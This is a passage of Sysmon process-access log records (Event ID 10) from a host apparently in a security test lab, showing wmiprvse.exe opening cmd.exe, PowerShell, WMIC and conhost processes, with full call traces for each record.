{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5914,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00105BE20800}\r\nTargetProcessId: 1592\r\nTargetImage: C:\\Windows\\system32\\conhost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00105BE20800}","TargetProcessId":"1592","TargetImage":"C:\\Windows\\system32\\conhost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5915,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-0010ADE40800}\r\nTargetProcessId: 4360\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-0010ADE40800}","TargetProcessId":"4360","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5916,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5917,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-001081F10800}\r\nTargetProcessId: 3496\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-001081F10800}","TargetProcessId":"3496","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5918,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nTargetProcessId: 1052\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","TargetProcessId":"1052","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5919,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-001066360900}\r\nTargetProcessId: 1428\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-001066360900}","TargetProcessId":"1428","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5920,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.581\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D9-5F25-0000-00102C370900}\r\nTargetProcessId: 4808\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.581","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D9-5F25-0000-00102C370900}","TargetProcessId":"4808","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\